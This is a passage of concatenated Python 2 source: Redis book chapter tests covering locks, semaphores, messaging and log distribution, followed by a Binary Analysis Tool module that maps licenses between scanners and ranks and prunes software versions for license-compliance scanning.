decoder = zlib.decompressobj(-zlib.MAX_WBITS) #D
if not block:
continue
if not block: #E
yield decoder.flush() #E
break
yield decoder.decompress(block) #F
# <end id="_1314_14473_9229"/>
#A Read the raw data from Redis
#B Parse the header information so that we can get the compressed data
#C We haven't read the full header yet
#D We found the header, prepare the decompressor
#E We are out of data, yield the last chunk
#F Yield a decompressed block
#END
class TestCh06(unittest.TestCase):
def setUp(self):
import redis
self.conn = redis.Redis(db=15)
def tearDown(self):
del self.conn
print
print
def test_add_update_contact(self):
import pprint
conn = self.conn
conn.delete('recent:user')
print "Let's add a few contacts..."
for i in xrange(10):
add_update_contact(conn, 'user', 'contact-%i-%i'%(i//3, i))
print "Current recently contacted contacts"
contacts = conn.lrange('recent:user', 0, -1)
pprint.pprint(contacts)
self.assertTrue(len(contacts) >= 10)
print
print "Let's pull one of the older ones up to the front"
add_update_contact(conn, 'user', 'contact-1-4')
contacts = conn.lrange('recent:user', 0, 2)
print "New top-3 contacts:"
pprint.pprint(contacts)
self.assertEquals(contacts[0], 'contact-1-4')
print
print "Let's remove a contact..."
print remove_contact(conn, 'user', 'contact-2-6')
contacts = conn.lrange('recent:user', 0, -1)
print "New contacts:"
pprint.pprint(contacts)
self.assertTrue(len(contacts) >= 9)
print
print "And let's finally autocomplete on "
all = conn.lrange('recent:user', 0, -1)
contacts = fetch_autocomplete_list(conn, 'user', 'c')
self.assertTrue(all == contacts)
equiv = [c for c in all if c.startswith('contact-2-')]
contacts = fetch_autocomplete_list(conn, 'user', 'contact-2-')
equiv.sort()
contacts.sort()
self.assertEquals(equiv, contacts)
conn.delete('recent:user')
def test_address_book_autocomplete(self):
self.conn.delete('members:test')
print "the start/end range of 'abc' is:", find_prefix_range('abc')
print
print "Let's add a few people to the guild"
for name in ['jeff', 'jenny', 'jack', 'jennifer']:
join_guild(self.conn, 'test', name)
print
print "now let's try to find users with names starting with 'je':"
r = autocomplete_on_prefix(self.conn, 'test', 'je')
print r
self.assertTrue(len(r) == 3)
print "jeff just left to join a different guild..."
leave_guild(self.conn, 'test', 'jeff')
r = autocomplete_on_prefix(self.conn, 'test', 'je')
print r
self.assertTrue(len(r) == 2)
self.conn.delete('members:test')
def test_distributed_locking(self):
self.conn.delete('lock:testlock')
print "Getting an initial lock..."
self.assertTrue(acquire_lock_with_timeout(self.conn, 'testlock', 1, 1))
print "Got it!"
print "Trying to get it again without releasing the first one..."
self.assertFalse(acquire_lock_with_timeout(self.conn, 'testlock', .01, 1))
print "Failed to get it!"
print
print "Waiting for the lock to timeout..."
time.sleep(2)
print "Getting the lock again..."
r = acquire_lock_with_timeout(self.conn, 'testlock', 1, 1)
self.assertTrue(r)
print "Got it!"
print "Releasing the lock..."
self.assertTrue(release_lock(self.conn, 'testlock', r))
print "Released it..."
print
print "Acquiring it again..."
self.assertTrue(acquire_lock_with_timeout(self.conn, 'testlock', 1, 1))
print "Got it!"
self.conn.delete('lock:testlock')
def test_counting_semaphore(self):
self.conn.delete('testsem', 'testsem:owner', 'testsem:counter')
print "Getting 3 initial semaphores with a limit of 3..."
for i in xrange(3):
self.assertTrue(acquire_fair_semaphore(self.conn, 'testsem', 3, 1))
print "Done!"
print "Getting one more that should fail..."
self.assertFalse(acquire_fair_semaphore(self.conn, 'testsem', 3, 1))
print "Couldn't get it!"
print
print "Lets's wait for some of them to time out"
time.sleep(2)
print "Can we get one?"
r = acquire_fair_semaphore(self.conn, 'testsem', 3, 1)
self.assertTrue(r)
print "Got one!"
print "Let's release it..."
self.assertTrue(release_fair_semaphore(self.conn, 'testsem', r))
print "Released!"
print
print "And let's make sure we can get 3 more!"
for i in xrange(3):
self.assertTrue(acquire_fair_semaphore(self.conn, 'testsem', 3, 1))
print "We got them!"
self.conn.delete('testsem', 'testsem:owner', 'testsem:counter')
def test_delayed_tasks(self):
import threading
self.conn.delete('queue:tqueue', 'delayed:')
print "Let's start some regular and delayed tasks..."
for delay in [0, .5, 0, 1.5]:
self.assertTrue(execute_later(self.conn, 'tqueue', 'testfn', [], delay))
r = self.conn.llen('queue:tqueue')
print "How many non-delayed tasks are there (should be 2)?", r
self.assertEquals(r, 2)
print
print "Let's start up a thread to bring those delayed tasks back..."
t = threading.Thread(target=poll_queue, args=(self.conn,))
t.setDaemon(1)
t.start()
print "Started."
print "Let's wait for those tasks to be prepared..."
time.sleep(2)
global QUIT
QUIT = True
t.join()
r = self.conn.llen('queue:tqueue')
print "Waiting is over, how many tasks do we have (should be 4)?", r
self.assertEquals(r, 4)
self.conn.delete('queue:tqueue', 'delayed:')
def test_multi_recipient_messaging(self):
self.conn.delete('ids:chat:', 'msgs:1', 'ids:1', 'seen:joe', 'seen:jeff', 'seen:jenny')
print "Let's create a new chat session with some recipients..."
chat_id = create_chat(self.conn, 'joe', ['jeff', 'jenny'], 'message 1')
print "Now let's send a few messages..."
for i in xrange(2, 5):
send_message(self.conn, chat_id, 'joe', 'message %s'%i)
print
print "And let's get the messages that are waiting for jeff and jenny..."
r1 = fetch_pending_messages(self.conn, 'jeff')
r2 = fetch_pending_messages(self.conn, 'jenny')
print "They are the same?", r1==r2
self.assertEquals(r1, r2)
print "Those messages are:"
import pprint
pprint.pprint(r1)
self.conn.delete('ids:chat:', 'msgs:1', 'ids:1', 'seen:joe', 'seen:jeff', 'seen:jenny')
def test_file_distribution(self):
import gzip, shutil, tempfile, threading
self.conn.delete('test:temp-1.txt', 'test:temp-2.txt', 'test:temp-3.txt', 'msgs:test:', 'seen:0', 'seen:source', 'ids:test:', 'chat:test:')
dire = tempfile.mkdtemp()
try:
print "Creating some temporary 'log' files..."
with open(dire + '/temp-1.txt', 'wb') as f:
f.write('one line\n')
with open(dire + '/temp-2.txt', 'wb') as f:
f.write(10000 * 'many lines\n')
out = gzip.GzipFile(dire + '/temp-3.txt.gz', mode='wb')
for i in xrange(100000):
out.write('random line %s\n'%(os.urandom(16).encode('hex'),))
out.close()
size = os.stat(dire + '/temp-3.txt.gz').st_size
print "Done."
print
print "Starting up a thread to copy logs to redis..."
t = threading.Thread(target=copy_logs_to_redis, args=(self.conn, dire, 'test:', 1, size))
t.setDaemon(1)
t.start()
print "Let's pause to let some logs get copied to Redis..."
time.sleep(.25)
print
print "Okay, the logs should be ready. Let's process them!"
index = [0]
counts = [0, 0, 0]
def callback(conn, line):
if line is None:
print "Finished with a file %s, linecount: %s"%(index[0], counts[index[0]])
index[0] += 1
elif line or line.endswith('\n'):
counts[index[0]] += 1
print "Files should have 1, 10000, and 100000 lines"
process_logs_from_redis(self.conn, '0', callback)
self.assertEquals(counts, [1, 10000, 100000])
print
print "Let's wait for the copy thread to finish cleaning up..."
t.join()
print "Done cleaning out Redis!"
finally:
print "Time to clean up files..."
shutil.rmtree(dire)
print "Cleaned out files!"
self.conn.delete('test:temp-1.txt', 'test:temp-2.txt', 'test:temp-3.txt', 'msgs:test:', 'seen:0', 'seen:source', 'ids:test:', 'chat:test:')
if __name__ == '__main__':
unittest.main()
|
licenseversion.py
|
#!/usr/bin/python
## Binary Analysis Tool
## Copyright 2011-2016 Armijn Hemel for Tjaldur Software Governance Solutions
## Licensed under Apache 2.0, see LICENSE file for details
import os, os.path, sys, subprocess, copy, cPickle, Queue
import multiprocessing, re, datetime
from multiprocessing import Process, Lock
from multiprocessing.sharedctypes import Value, Array
if sys.version_info[1] == 7:
import collections
have_counter = True
else:
have_counter = False
'''
This file contains the ranking algorithm as described in the paper
"Finding Software License Violations Through Binary Code Clone Detection"
by Armijn Hemel, Karl Trygve Kalleberg, Eelco Dolstra and Rob Vermaas, as
presented at the Mining Software Repositories 2011 conference.
In this scan, results can optionally be pruned. Results of scans can get very
large: for example, a scan of a Linux kernel image could have thousands of
string matches, each of which can be found in a few hundred kernel source code
archives.
By pruning results the amount of noise can be greatly reduced, reports can be
made smaller, and source code checks using the results of BAT can be made more
effective.
To remove a version A from the set of versions the following conditions have
to hold:
* there is a minimum number of results available (20 or 30 seems to be a good cut-off value)
* all strings/variables/function names found in A are also found in the most promising
version
* the number of strings/variables/function names found in A is significantly
smaller than the number in the most promising version (expressed as a maximum
percentage)
A small illustrative sketch of these conditions follows right after this
description; the actual pruning is implemented in the prune() function.
Ranking results for Java JAR files are aggregated. Individual class files often
do not contain enough information. By aggregating the results of these classes
it is possible to get a better view of what is inside a JAR.
The parameter AGGREGATE_CLEAN can be set to 1 to indicate that .class files
should be removed from the result set after aggregation. By default these files
are not removed.
'''
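## The pruning conditions above can be summarised in a small, self-contained
## sketch. Illustrative only: prune_sketch, minimumresults and maxpercentage
## are made-up names, and the real implementation is the prune() function
## further below in this file.
def prune_sketch(hits, lines, minimumresults=20, maxpercentage=10):
    ## hits: version -> number of matched identifiers
    ## lines: version -> set of matched identifiers
    best = max(hits, key=hits.get)
    if hits[best] < minimumresults:
        ## too few results to make pruning meaningful
        return []
    return [version for version in hits
            if version != best
            and lines[version].issubset(lines[best])
            and (hits[version] * 100.0) / hits[best] <= maxpercentage]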
## lookup tables for names of string caches and string cache scores
stringsdbperlanguagetable = { 'C': 'stringscache_c'
, 'C#': 'stringscache_csharp'
, 'Java': 'stringscache_java'
, 'JavaScript': 'stringscache_javascript'
, 'PHP': 'stringscache_php'
, 'Python': 'stringscache_python'
, 'Ruby': 'stringscache_ruby'
, 'ActionScript': 'stringscache_actionscript'
}
avgstringsdbperlanguagetable = { 'C': 'avgstringscache_c'
, 'C#': 'avgstringscache_csharp'
, 'Java': 'avgstringscache_java'
, 'JavaScript': 'avgstringscache_javascript'
, 'PHP': 'avgstringscache_php'
, 'Python': 'avgstringscache_python'
, 'Ruby': 'avgstringscache_ruby'
, 'ActionScript': 'avgstringscache_actionscript'
}
## mappings from FOSSology to Ninka and vice versa
ninka_to_fossology = { 'LesserGPLv2+': 'LGPL-2.0+'
, 'BSD3': 'BSD-3-Clause'
, 'boostV1Ref': 'BSL-1.0'
}
fossology_to_ninka = { 'No_license_found': 'NONE'
, 'GPL-1.0': 'GPLv1'
, 'GPL-1.0+': 'GPLv1+'
, 'GPL-2.0': 'GPLv2'
, 'GPL-2.0+': 'GPLv2+'
, 'GPL-3.0': 'GPLv3'
, 'GPL-3.0+': 'GPLv3+'
, 'LGPL-2.0': 'LibraryGPLv2'
, 'LGPL-2.0+': 'LibraryGPLv2+'
, 'LGPL-2.1': 'LesserGPLv2.1'
, 'LGPL-2.1+': 'LesserGPLv2.1+'
, 'LGPL-3.0': 'LesserGPLv3'
, 'LGPL-3.0+': 'LesserGPLv3+'
, 'Apache-1.0': 'Apachev1.0'
, 'Apache-1.1': 'Apachev1.1'
, 'Apache-2.0': 'Apachev2'
, 'BSL-1.0': 'boostV1'
, 'MPL-1.0': 'MPLv1_0'
, 'FTL': 'FreeType'
, 'PHP-3.01': 'phpLicV3.01'
, 'Postfix': 'Postfix'
, 'QPL-1.0': 'QTv1'
, 'MPL-1.1': 'MPLv1_1'
, 'Zend-2.0': 'zendv2'
, 'NPL-1.1': 'NPLv1_1'
, 'BSD-2-Clause': 'spdxBSD2'
, 'BSD-3-Clause': 'spdxBSD3'
, 'EPL-1.0': 'EPLv1'
, 'Artifex': 'artifex'
, 'CDDL': 'CDDLic'
, 'Public-domain': 'publicDomain'
, 'Public-domain-ref': 'publicDomain'
, 'IPL': 'IBMv1'
, 'Intel': 'IntelACPILic'
, 'MX4J-1.0': 'MX4JLicensev1'
, 'Beerware': 'BeerWareVer42'
, 'CPL-1.0': 'CPLv1'
, 'Sun': 'sunRPC'
, 'SunPro': 'SunSimpleLic'
, 'W3C-IP': 'W3CLic'
, 'Artistic-1.0': 'ArtisticLicensev1'
}
reerrorlevel = re.compile("<[\d+cd]>")
reparam = re.compile("([\w_]+)\.([\w_]+)")
rematch = re.compile("\d+")
## The scanners that are used in BAT are Ninka and FOSSology. These scanners
## don't always agree on results, but when they do, it is very reliable.
def squashlicenses(licenses):
## licenses: [(license, scanner)]
if len(licenses) != 2:
return licenses
if licenses[0][1] == 'ninka':
if fossology_to_ninka.has_key(licenses[1][0]):
if fossology_to_ninka[licenses[1][0]] == licenses[0][0]:
if licenses[0][0] == 'InterACPILic':
licenses = [('IntelACPILic', 'squashed')]
else:
licenses = [(licenses[0][0], 'squashed')]
else:
status = "difference"
elif licenses[1][1] == 'ninka':
if fossology_to_ninka.has_key(licenses[0][0]):
if fossology_to_ninka[licenses[0][0]] == licenses[1][0]:
if licenses[0][0] == 'InterACPILic':
licenses = [('IntelACPILic', 'squashed')]
else:
licenses = [(licenses[0][0], 'squashed')]
return licenses
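## A minimal usage sketch for squashlicenses() (illustrative only; the example
## function below is not part of the original scanner, and the expected values
## follow from the fossology_to_ninka table above).
def squashlicenses_example():
    ## Ninka and FOSSology agree ('GPL-2.0' maps to 'GPLv2'), so the pair is
    ## collapsed into a single 'squashed' result
    agreed = squashlicenses([('GPLv2', 'ninka'), ('GPL-2.0', 'fossology')])
    assert agreed == [('GPLv2', 'squashed')]
    ## the scanners disagree, so the results are returned unchanged
    disagreed = squashlicenses([('GPLv2', 'ninka'), ('Apache-2.0', 'fossology')])
    assert disagreed == [('GPLv2', 'ninka'), ('Apache-2.0', 'fossology')]
    return agreed, disagreed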
def aggregatejars(unpackreports, scantempdir, topleveldir, pool, scanenv, cleanclasses, scandebug=False, unpacktempdir=None):
## find all JAR files. Do this by:
## 1. checking the tags for 'zip'
## 2. verifying for unpacked files that there are .class files
## 3. TODO: possibly verifying there is a META-INF directory with a manifest
sha256stofiles = {}
jarfiles = []
sha256seen = []
alljarfiles = []
for i in unpackreports:
if not 'checksum' in unpackreports[i]:
continue
else:
filehash = unpackreports[i]['checksum']
if not os.path.exists(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash)):
continue
if cleanclasses:
if filehash in sha256stofiles:
sha256stofiles[filehash].append(i)
else:
sha256stofiles[filehash] = [i]
## check extension: JAR, WAR, RAR (not Resource adapter), EAR
i_nocase = i.lower()
if i_nocase.endswith('.jar') or i_nocase.endswith('.ear') or i_nocase.endswith('.war') or i_nocase.endswith('.rar'):
if 'tags' in unpackreports[i]:
if 'duplicate' in unpackreports[i]['tags']:
alljarfiles.append(i)
continue
if filehash in sha256seen:
alljarfiles.append(i)
continue
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'rb')
leafreports = cPickle.load(leaf_file)
leaf_file.close()
if 'tags' in leafreports:
## check if it was tagged as a ZIP file
if 'zip' in leafreports['tags']:
## sanity checks
if unpackreports[i]['scans'] != []:
## since it was a single ZIP file there should be only
## one item in unpackreports[i]['scans']
if len(unpackreports[i]['scans']) != 1:
continue
## more sanity checks
if unpackreports[i]['scans'][0]['offset'] != 0:
continue
if unpackreports[i]['scans'][0]['scanname'] != 'zip':
continue
jarfiles.append(i)
sha256seen.append(filehash)
alljarfiles.append(i)
jartasks = []
for i in jarfiles:
classfiles = filter(lambda x: x.endswith('.class'), unpackreports[i]['scans'][0]['scanreports'])
classreports = map(lambda x: unpackreports[x], classfiles)
jartasks.append((i, unpackreports[i], classreports, topleveldir))
ranked = set()
if jartasks != []:
res = pool.map(aggregate, jartasks, 1)
for i in res:
(jarfile, rankres) = i
if rankres:
for j in sha256stofiles[unpackreports[jarfile]['checksum']]:
ranked.add(j)
for i in ranked:
if 'tags' in unpackreports[i]:
unpackreports[i]['tags'].append('ranking')
else:
unpackreports[i]['tags'] = ['ranking']
## if cleanclasses is set the following should be removed:
## * reference in unpackreports (always)
## * pickle of file, only if either unique to a JAR, or shared in several JARs,
## but not when the class file can also be found outside of a JAR.
if cleanclasses:
for i in alljarfiles:
if 'tags' in unpackreports[i]:
if 'duplicate' in unpackreports[i]['tags']:
continue
classfiles = filter(lambda x: x.endswith('.class'), unpackreports[i]['scans'][0]['scanreports'])
for c in classfiles:
filehash = unpackreports[c]['checksum']
if len(sha256stofiles[filehash]) == 1:
try:
os.unlink(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash))
except Exception, e:
print >>sys.stderr, "error removing", c, e
sys.stderr.flush()
sha256stofiles[filehash].remove(c)
else:
sha256stofiles[filehash].remove(c)
del unpackreports[c]
return ranked
## aggregate results for a single JAR file
def aggregate((jarfile, jarreport, unpackreports, topleveldir)):
rankres = {}
matchedlines = 0
matchednonassignedlines = 0
matcheddirectassignedlines = 0
matchednotclonelines = 0
unmatchedlines = 0
reports = []
extractedlines = 0
nonUniqueAssignments = {}
unmatched = []
ignored = []
nonUniqueMatches = {}
totalscore = 0
scoresperpkg = {}
uniqueMatchesperpkg = {}
packageversionsperpkg = {}
packagelicensesperpkg = {}
fieldmatches = {}
classmatches = {}
sourcematches = {}
## from dynamicres
totalnames = 0
uniquematches = 0
namesmatched = 0
packagesmatched = {}
dynamicresfinal = {}
pv = {}
uniquematcheslenperpkg = {}
upp = {}
aggregated = False
for c in unpackreports:
## sanity checks
if not 'tags' in c:
continue
if not 'ranking' in c['tags']:
continue
filehash = c['checksum']
if not os.path.exists(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash)):
continue
## read pickle file
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'rb')
leafreports = cPickle.load(leaf_file)
leaf_file.close()
## and more sanity checks
if not 'binary' in leafreports['tags']:
continue
(stringmatches, dynamicres, varfunmatches, language) = leafreports['ranking']
if language != 'Java':
continue
if 'fields' in varfunmatches:
for f in varfunmatches['fields']:
if not f in fieldmatches:
fieldmatches[f] = varfunmatches['fields'][f]
aggregated = True
else:
fieldmatches[f] += varfunmatches['fields'][f]
if 'classes' in varfunmatches:
for c in varfunmatches['classes']:
if not c in classmatches:
classmatches[c] = varfunmatches['classes'][c]
aggregated = True
else:
classmatches[c] += varfunmatches['classes'][c]
if 'sources' in varfunmatches:
for c in varfunmatches['sources']:
if not c in sourcematches:
sourcematches[c] = varfunmatches['sources'][c]
aggregated = True
else:
sourcematches[c] += varfunmatches['sources'][c]
if stringmatches != None:
aggregated = True
matchedlines = matchedlines + stringmatches['matchedlines']
matchednonassignedlines = matchednonassignedlines + stringmatches['matchednonassignedlines']
matchednotclonelines = matchednotclonelines + stringmatches['matchednotclonelines']
unmatchedlines = unmatchedlines + stringmatches['unmatchedlines']
extractedlines = extractedlines + stringmatches['extractedlines']
if stringmatches['unmatched'] != []:
unmatched = unmatched + stringmatches['unmatched']
if stringmatches['ignored'] != []:
ignored = ignored + stringmatches['ignored']
if stringmatches['nonUniqueAssignments'] != {}:
for n in stringmatches['nonUniqueAssignments'].keys():
if n in nonUniqueAssignments:
nonUniqueAssignments[n] = nonUniqueAssignments[n] + stringmatches['nonUniqueAssignments'][n]
else:
nonUniqueAssignments[n] = stringmatches['nonUniqueAssignments'][n]
if stringmatches['nonUniqueMatches'] != {}:
for n in stringmatches['nonUniqueMatches'].keys():
if n in nonUniqueMatches:
nonUniqueMatches[n] = list(set(nonUniqueMatches[n] + stringmatches['nonUniqueMatches'][n]))
else:
nonUniqueMatches[n] = stringmatches['nonUniqueMatches'][n]
if stringmatches['scores'] != {}:
for s in stringmatches['scores']:
totalscore = totalscore + stringmatches['scores'][s]
if s in scoresperpkg:
scoresperpkg[s] = scoresperpkg[s] + stringmatches['scores'][s]
else:
scoresperpkg[s] = stringmatches['scores'][s]
if stringmatches['reports'] != []:
for r in stringmatches['reports']:
rank = r['rank']
package = r['package']
unique = r['unique']
uniquematcheslen = r['uniquematcheslen']
percentage = r['percentage']
packageversions = r['packageversions']
packagelicenses = r['packagelicenses']
packagecopyrights = r['packagecopyrights']
## ignore rank and percentage
if package in uniqueMatchesperpkg:
tmpres = []
for p in unique:
if p[0] in upp:
continue
else:
tmpres.append(p)
upp[p[0]] = 1
uniqueMatchesperpkg[package] = uniqueMatchesperpkg[package] + tmpres
else:
uniqueMatchesperpkg[package] = unique
if packageversions != {}:
if not package in packageversionsperpkg:
packageversionsperpkg[package] = {}
for k in packageversions:
if k in packageversionsperpkg[package]:
packageversionsperpkg[package][k] = packageversionsperpkg[package][k] + packageversions[k]
else:
packageversionsperpkg[package][k] = packageversions[k]
if package in packagelicensesperpkg:
packagelicensesperpkg[package] = packagelicensesperpkg[package] + packagelicenses
else:
packagelicensesperpkg[package] = packagelicenses
if package in uniquematcheslenperpkg:
uniquematcheslenperpkg[package] += uniquematcheslen
else:
uniquematcheslenperpkg[package] = uniquematcheslen
if dynamicres != {}:
aggregated = True
if 'uniquepackages' in dynamicres:
if dynamicres['uniquepackages'] != {}:
if not 'uniquepackages' in dynamicresfinal:
dynamicresfinal['uniquepackages'] = {}
for d in dynamicres['uniquepackages'].keys():
if d in dynamicresfinal['uniquepackages']:
dynamicresfinal['uniquepackages'][d] = list(set(dynamicresfinal['uniquepackages'][d] + dynamicres['uniquepackages'][d]))
else:
dynamicresfinal['uniquepackages'][d] = dynamicres['uniquepackages'][d]
if not aggregated:
return (jarfile, aggregated)
scores_sorted = sorted(scoresperpkg, key = lambda x: scoresperpkg.__getitem__(x), reverse=True)
rank = 1
reports = []
packagecopyrights = []
for s in scores_sorted:
try:
percentage = (scoresperpkg[s]/totalscore)*100.0
except:
percentage = 0.0
reports.append({'rank': rank, 'package': s, 'unique': uniqueMatchesperpkg.get(s,[]), 'uniquematcheslen': uniquematcheslenperpkg.get(s,0), 'percentage': percentage, 'packageversions': packageversionsperpkg.get(s, {}), 'packagelicenses': list(set(packagelicensesperpkg.get(s, []))), 'packagecopyrights': packagecopyrights})
rank = rank+1
if 'uniquepackages' in dynamicresfinal:
dynamicresfinal['namesmatched'] = reduce(lambda x, y: x + y, map(lambda x: len(x[1]), dynamicresfinal['uniquepackages'].items()))
else:
dynamicresfinal['namesmatched'] = 0
dynamicresfinal['uniquematches'] = uniquematches
dynamicresfinal['totalnames'] = namesmatched
dynamicresfinal['packages'] = packagesmatched
unmatched = list(set(unmatched))
unmatched.sort()
rankres['unmatched'] = unmatched
rankres['ignored'] = list(set(ignored))
rankres['matchedlines'] = matchedlines
rankres['matchednonassignedlines'] = matchednonassignedlines
rankres['matchednotclonelines'] = matchednotclonelines
rankres['unmatchedlines'] = unmatchedlines
rankres['extractedlines'] = extractedlines
rankres['nonUniqueAssignments'] = nonUniqueAssignments
rankres['nonUniqueMatches'] = nonUniqueMatches
rankres['reports'] = reports
## now write the new result
## TODO: only do this if there actually is an aggregate result
filehash = jarreport['checksum']
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'rb')
leafreports = cPickle.load(leaf_file)
leaf_file.close()
leafreports['ranking'] = (rankres, dynamicresfinal, {'classes': classmatches, 'fields': fieldmatches, 'sources': sourcematches}, 'Java')
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'wb')
leafreports = cPickle.dump(leafreports, leaf_file)
leaf_file.close()
return (jarfile, aggregated)
def prune(uniques, package):
if have_counter:
uniqueversions = collections.Counter()
else:
uniqueversions = {}
linesperversion = {}
for u in uniques:
(line, res) = u
versions = set()
for r in res:
(checksum, linenumber, versionfilenames) = r
map(lambda x: versions.add(x[0]), versionfilenames)
for version in versions:
if version in linesperversion:
linesperversion[version].add(line)
else:
linesperversion[version] = set([line])
if have_counter:
uniqueversions.update(versions)
else:
for version in versions:
if version in uniqueversions:
uniqueversions[version] += 1
else:
uniqueversions[version] = 1
## there is only one version, so no need to continue
if len(uniqueversions.keys()) == 1:
return uniques
pruneme = set()
unique_sorted_rev = sorted(uniqueversions, key = lambda x: uniqueversions.__getitem__(x), reverse=True)
unique_sorted = sorted(uniqueversions, key = lambda x: uniqueversions.__getitem__(x))
equivalents = set()
for l in unique_sorted_rev:
if l in pruneme:
continue
if l in equivalents:
continue
linesperversion_l = set(linesperversion[l])
pruneremove = set()
for k in unique_sorted:
if uniqueversions[k] == uniqueversions[l]:
## Both versions have the same number of identifiers, so
## could be the same. If so, add to 'equivalents'
## and skip all equivalents since the results would be the
## same as with the current 'l' and no versions would be
## pruned that weren't already pruned.
if linesperversion[k] == linesperversion_l:
equivalents.add(k)
continue
if uniqueversions[k] > uniqueversions[l]:
break
if set(linesperversion[k]).issubset(linesperversion_l):
pruneme.add(k)
pruneremove.add(k)
## make the inner loop a bit shorter
for k in pruneremove:
unique_sorted.remove(k)
## TODO: pruneme might have length 0, so uniques can be returned. Verify this.
notpruned = set(uniqueversions.keys()).difference(pruneme)
newuniques = []
for u in uniques:
(line, res) = u
newres = []
for r in res:
(checksum, linenumber, versionfilenames) = r
filterres = filter(lambda x: x[0] in notpruned, versionfilenames)
if filterres != []:
newres.append((checksum, linenumber, filterres))
newuniques.append((line, newres))
return newuniques
def determinelicense_version_copyright(unpackreports, scantempdir, topleveldir, processors, scanenv, batcursors, batcons, scandebug=False, unpacktempdir=None):
## sanity check if the database really is there
if batcursors[0] == None:
return None
## the environment might have changed and been cleaned up,
## so overwrite the old one
determineversion = False
if scanenv.get('BAT_RANKING_VERSION', 0) == '1':
determineversion = True
determinelicense = False
if scanenv.get('BAT_RANKING_LICENSE', 0) == '1':
determinelicense = True
determinecopyright = False
if scanenv.get('BAT_RANKING_COPYRIGHT', 0) == '1':
determinecopyright = True
## only continue if there actually is a need
if not determinelicense and not determineversion and not determinecopyright:
return None
## ignore files which don't have ranking results
rankingfiles = set()
filehashseen = set()
hashtoname = {}
rankingfilesperlanguage = {}
for i in unpackreports:
if not 'checksum' in unpackreports[i]:
continue
if not 'tags' in unpackreports[i]:
continue
if not 'identifier' in unpackreports[i]['tags']:
continue
filehash = unpackreports[i]['checksum']
if filehash in hashtoname:
hashtoname[filehash].append(i)
else:
hashtoname[filehash] = [i]
if filehash in filehashseen:
continue
filehashseen.add(filehash)
if not os.path.exists(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash)):
continue
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'rb')
leafreports = cPickle.load(leaf_file)
leaf_file.close()
if not 'identifier' in leafreports:
continue
language = leafreports['identifier']['language']
if language in rankingfilesperlanguage:
rankingfilesperlanguage[language].add(i)
else:
rankingfilesperlanguage[language] = set([i])
if len(rankingfilesperlanguage) == 0:
return None
## Some methods use a database to look up renamed packages.
clones = {}
clonedb = scanenv.get('HAVE_CLONE_DB')
if clonedb == 1:
conn = batcons[0]
c = batcursors[0]
c.execute("SELECT originalname,newname from renames")
clonestmp = c.fetchall()
conn.commit()
for cl in clonestmp:
(originalname,newname) = cl
if not originalname in clones:
clones[originalname] = newname
## suck the average string scores database into memory. Even with a few million packages
## this will not cost much memory and it prevents many database lookups.
avgscores = {}
for language in avgstringsdbperlanguagetable:
if not language in rankingfilesperlanguage:
continue
if not language in scanenv['supported_languages']:
continue
## open the database containing all the strings that were extracted
## from source code.
conn = batcons[0]
c = batcursors[0]
avgscores[language] = {}
avgquery = "select package, avgstrings from %s" % avgstringsdbperlanguagetable[language]
c.execute(avgquery)
res = c.fetchall()
conn.commit()
for r in filter(lambda x: x[1] != 0, res):
avgscores[language][r[0]] = r[1]
## create a queue for tasks, with a few processes reading from the queue,
## looking up results and putting them in a result queue
scanmanager = multiprocessing.Manager()
res = []
if processors == None:
processamount = 1
else:
processamount = processors
## now process each file per language
for language in rankingfilesperlanguage:
if len(rankingfilesperlanguage[language]) == 0:
continue
## creating new queues (max: number of tasks, or CPUs, whichever is smallest)
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
lock = Lock()
ignorecache = scanmanager.dict()
lookup_tasks = map(lambda x: (unpackreports[x]['checksum'], os.path.join(unpackreports[x]['realpath'], unpackreports[x]['name'])),rankingfilesperlanguage[language])
map(lambda x: scanqueue.put(x), lookup_tasks)
minprocessamount = min(len(lookup_tasks), processamount)
processpool = []
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=lookup_identifier, args=(scanqueue,reportqueue, batcursors[i], batcons[i],scanenv,topleveldir,avgscores,clones,scandebug,ignorecache, lock))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
res.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
## finally shut down the scan manager
scanmanager.shutdown()
for filehash in res:
if filehash != None:
if filehash in hashtoname:
for w in hashtoname[filehash]:
unpackreports[w]['tags'].append('ranking')
## optionally aggregate the JAR files
if 'Java' in rankingfilesperlanguage:
cleanclasses = False
if scanenv.get('AGGREGATE_CLEAN', 0) == '1':
cleanclasses = True
pool = multiprocessing.Pool(processes=processors)
rankedjars = aggregatejars(unpackreports, scantempdir, topleveldir, pool, scanenv, cleanclasses, scandebug=False, unpacktempdir=None)
pool.terminate()
for r in rankedjars:
## results are now aggregated, so add the JAR file to
## the list of rankingfiles for Java
rankingfilesperlanguage['Java'].add(r)
## .class files might have been removed at this point, so sanity check first
rankingfiles = set()
filehashseen = set()
## sanity check to see if all the ranking files are still there
for l in rankingfilesperlanguage:
newrankingfiles = set()
for i in rankingfilesperlanguage[l]:
if i in unpackreports:
newrankingfiles.add(i)
rankingfilesperlanguage[l] = newrankingfiles
## Determine the most likely versions for each of the scanned binaries.
## Currently finding the version is based on unique matches that were found.
## If determinelicense or determinecopyright are set licenses and copyright statements
## are also extracted.
pruning = False
if 'BAT_KEEP_VERSIONS' in scanenv:
keepversions = int(scanenv.get('BAT_KEEP_VERSIONS', 0))
if keepversions > 0:
## there needs to be a minimum number of unique hits (like strings), otherwise
## it's silly
if 'BAT_MINIMUM_UNIQUE' in scanenv:
minimumunique = int(scanenv.get('BAT_MINIMUM_UNIQUE', 0))
if minimumunique > 0:
pruning = True
## first determine whether or not there are any unique matches at all and
## whether there should be database queries
#alluniques = set()
connectdb = False
for language in rankingfilesperlanguage:
if connectdb:
break
## keep a list of versions per sha256, since source files often are in more than one version
